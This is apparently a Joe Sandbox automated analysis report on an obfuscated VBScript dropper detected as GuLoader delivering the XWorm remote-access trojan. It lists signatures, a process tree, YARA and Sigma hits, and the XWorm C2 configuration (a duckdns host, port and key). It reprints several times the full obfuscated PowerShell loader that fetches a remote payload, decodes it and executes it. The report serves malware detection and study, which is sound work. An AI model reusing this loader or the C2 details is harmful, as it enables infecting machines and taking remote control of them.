Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.vbs

Overview

General Information

Sample name:file.vbs
Analysis ID:1446634
MD5:7c89c3540caaa52052018271109f6a9a
SHA1:78c973d9ab8326fbbacb11b7c5d8492030f8e3c4
SHA256:9fde917e0e590e34264a37918d73be9645301cd68793cf28bbb8430dd1a6fed2
Tags:vbs
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7920 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5824 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7124 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6052 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["xwormmom53.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1960362593.0000000008BB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000008.00000002.1952620099.0000000005F08000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000008.00000002.1960677789.000000000A947000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000B.00000002.2662796523.0000000005827000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7772.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7772.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10114:$b2: ::FromBase64String(
              • 0xd4a2:$s1: -join
              • 0x6c4e:$s4: +=
              • 0x6d10:$s4: +=
              • 0xaf37:$s4: +=
              • 0xd054:$s4: +=
              • 0xd33e:$s4: +=
              • 0xd484:$s4: +=
              • 0xf6d2:$s4: +=
              • 0xf752:$s4: +=
              • 0xf818:$s4: +=
              • 0xf898:$s4: +=
              • 0xfa6e:$s4: +=
              • 0xfaf2:$s4: +=
              • 0xdbbb:$e4: Get-WmiObject
              • 0xddaa:$e4: Get-Process
              • 0xde02:$e4: Start-Process
              amsi32_5824.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc90a:$b2: ::FromBase64String(
              • 0x9d3a:$s1: -join
              • 0x34e6:$s4: +=
              • 0x35a8:$s4: +=
              • 0x77cf:$s4: +=
              • 0x98ec:$s4: +=
              • 0x9bd6:$s4: +=
              • 0x9d1c:$s4: +=
              • 0xbf6a:$s4: +=
              • 0xbfea:$s4: +=
              • 0xc0b0:$s4: +=
              • 0xc130:$s4: +=
              • 0xc306:$s4: +=
              • 0xc38a:$s4: +=
              • 0xa453:$e4: Get-WmiObject
              • 0xa642:$e4: Get-Process
              • 0xa69a:$e4: Start-Process
              • 0x147fa:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve 